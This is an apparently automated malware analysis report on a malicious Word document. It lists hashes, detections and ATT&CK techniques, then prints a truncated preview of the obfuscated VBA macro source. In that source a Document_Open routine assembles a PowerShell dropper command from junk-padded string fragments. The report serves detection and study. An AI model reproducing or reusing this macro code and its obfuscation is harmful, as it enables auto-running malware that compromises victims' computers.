Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7e3ea7a1e6f1e70c…

MALICIOUS

Office (OLE)

Size: 260.5 KB
Created: 2018-07-09 22:45:00
Authoring application: Microsoft Office Word
First seen: 2018-07-14
MD5: 4bcae2d004c688391216b3d7c56dbb43
SHA-1: a06cb0cdf65abf149658b7c4069911412acaa965
SHA-256: 7e3ea7a1e6f1e70cb6c2c85f4571fab88f27aec9677e0e1b1f070d617ef1ad3c
Risk score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The Document_Open macro triggers a Shell() call that executes a PowerShell command. The command is designed to download and execute a second-stage payload from a remote URL, indicating dropper functionality. In the extracted source below, the PowerShell command line is assembled from short string fragments concatenated with undefined junk variables (which evaluate to empty strings under On Error Resume Next), an obfuscation pattern intended to defeat static string matching.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6605641-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6605641-0
  • VBA macros detected [medium] OLE_VBA_MACROS (3 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 18838 bytes
SHA-256: 3e86b4701daade618c0120fa9639a2c2810e5a1863b8fb7afb623b3f9fbaa8c4
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "QdNinbYszdDwW"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
   cIBoT = (hKacLF * kUiZX - IXaHV - TNnHBN + 43548 - NKJqF + (40498 + rOUEuA))
   DrvWsO = (CAjCAh * DZPprI - KrTCiQ - FDbla + 67803 - PFqiwS + (15351 + KDUzz))
   hPhjS = (JOXcpf * OdWUAj - LGmvA - XcPuPu + 72252 - TMmZfm + (76379 + hojTRZ))
   psJHq = (dmidbh * cMvtBv - juUtX - ZwLhXw + 72965 - EXliz + (85991 + ArBLGk))
sPRfMvYlw ("" + EIkDsAcUJwlzz + ZwJnTYKsp + kiFAIwwZFUp + oQaASzhG + fdLDz + ZQdZTuXPkOBia + dvkYpJPB)
   iDTiQr = (XXIGU * uJAVt - rEapvi - zfliJ + 28950 - skrEjT + (44001 + HDtzIi))
   pnVQL = (HOYAFs * lswrtU - SvpaO - zXwvZ + 54380 - Qwrnz + (30281 + ccjjO))
End Sub


Attribute VB_Name = "WKuHPOjwtwvBB"
Function kiFAIwwZFUp()
On Error Resume Next
dXksk = MUizc / NViBPB + JszrQi + SMqzq + KHpUi * uDjED
   frdsiC = 25407 + aadfU * 20432 * rzdkIP - GjNWr - vaowu / 70237 * KoTLu * 56519 / jjLpK * 26022 / 23516 * 23396 * aSoQIk
   IKGPzm = 64831 + jHXCjS * 80241 * NnZUYM - ujrNdF - uZroD / 69555 * ljudE * 51126 / oJCHd * 18242 / 4972 * 41489 * cHvjL
RvkOnfzwVV = "p" + EfPNzLrPFI + iqUlYGZ + "owe" + AwRYOPh + MFbWZYK + "rsh" + wLsXBaSjlnJIE + TEjwpjvKH + "el" + WbIRvbjPbdMcuq + duzvHzIDVoMC + "l " + BlVFErX + ibpipGbpHjASP + "( " + oWTFvHOd + cbHpmOKJDO + "NeW" + VSwuzFTGk + OQhYSYkUzhG + "-o" + TzUUqIMunWB + BHJKBnrA + "b" + EqslSuVkPF + zkzQcYjatjX + "jEc" + cKnjSViabP + WtzRllvqaIYLkL + "T " + SiYTjOqki + jnAYUWTFijIHub + "I" + UlcvHCLIwrJOID + hpMDakEoQFom + "o.c" + drQSVwFIpj + bdMFzaQZaFPPV + "oM" + niBOYwaORzqh + YAjaiJacLIN + "P"
vXcBwl = SdnSD + 86431 * OuIHt / uBFjon + GKTtAC / iqovt
   LuNNW = IMhDBU + 43970 * tStMJK / HKtRB + WYFMNz / jHrVRz
YAzdPkHiY = "re" + PsjfZkYvjjl + kTwVLmn + "sSi" + nWYGmaYuMrPiu + WFlzKciLHfWY + "O" + ljGBYFJGTzzWoX + ZpSKwGAoROJ + "N.D" + aPCzzaKIc + bPloCnoGRfFhFO + "eF" + jSkJvwqshuX + kTzSWijUMldaCt + "LAT" + iwlzudpsNz + tGHQzJjMHP + "est"
PLUhHi = FFWzwm + 82239 * GdFEW / JbFdM + tMXOTN / kjJIk
   XTWHJ = GGZjCK + 24035 * FjODvF / shIjkj + TzUUZ / hqEwU
wFvmzodwKU = "R" + noLJBifzuFpa + mOaYzAncOhk + "E" + OfQiNiMFszXjC + DPfzICDqX + "AM" + VzKadYElQUiW + uZtRDpvaUYwCl + "([S" + KpsniNNuSTwfQ + ZtEHOcKZTGnvim + "ySt" + mQvFfliwijf + FKiQVzFwiZNAQY + "EM" + SiIqsMOVDTnKH + zjbOvJiJmWcI + "." + FPNBGMwWkFsw + CMvqArQQ + "io." + lhnZWUPE + wEaIBRiazVWzz + "M" + ZbmHzQoa + YYZAPpoZV + "E" + mmpjIqRSnlhWSw + zXXKdXsdsJZ + "m" + iaiDInowXqa + PiqCHEVM + "OR" + zDUPuMq + hmFLDSJIF + "YST"
PwHjZz = 94174 / TTOmVS + (kKvtp / wBwuzH + 8293 / znaEi)
   jznWH = 26851 / qCVOTr + (hzoYu / jrJoUJ + 36976 / jzvQjQ)
   ROLjuN = 40918 / vhRQc + (GkXfK / wJlas + 85887 / Wjnin)
sRllkiCzR = "re" + wkMubdACNh + PqCDYXTsHcl + "a" + rwUIzdh + JALkjnwGXsARG + "m]" + kJQPmLTwXsk + uOEKdXhBrno + "[CO" + BFsnkkTqXpNRLf + nrzIQMJ + "N" + niwdsVckpKOGk + LqWZrsSsqzEvoX + "v" + vEwzBUMfTkhVV + CjzwaqkwwUqHdo + "E" + MJVSBnKwqdqFG + XODBMpaFwLIwdK + "RT" + ruzULzJuOYBF + iqnWTtZmNwmDXG + "]:"
hnitzK = 18320 / mXFJmn + (UIwjRK / rTJEh + 97821 / HbDBZq)
LFDOLtSq = ":" + AUjzkvo + ZJRvZZbfbvLjud + "Fr" + iwBINwas + MkNVvftFHoQMCd + "Om" + PSQUFqWpGzmHmc + qbMqSFAfpp + "ba" + rRuYiThIck + OXPwsmTfFr + "S" + QjbJRkiQVAw + NZSubwF + "e6"
Ozbuf = 68835 / tlGZaW + (FzIqNV / LIqVF + 74727 / ichsK)
   buqDnD = 42433 / QAvTHz + (YqrGbA / ZariN + 1161 / duQrZH)
DJWhdFUD = "4S" + fjVibjGYnaNspR + tLCCpkZZwsPI + "tRi" + PRJLTbViujFj + ruQMtwwzCZFuHv + "NG" + RzzGKwjiwHOL + zFidiCbDP + "('" + POkFZTZBLSIk + vLmOljnijcAL + "V" + fHOhYYuh + YnoKFAoUns + "Z" + poiruhiIFNqMV + aLWqNMO + "Bd" + uddjnfYkZnSZDh + DqSKzboBz + "a8" + QCaiawjw + vUaoFni + "I" + XitdKWvfzSp + ZWIizJraWlMI + "wF" + sVsoFOSqiW + IfThdbcJv + "Ib/" + WnZvDAtjUCA + GijNTirl + "Si"
ALGpHk = 62054 / aopWBj + (PplqE / IcKaz + 85172 / qMLuM)
XSVsozrriEq = "8K" + wLlvoEZOTkdC + sGv
... (truncated)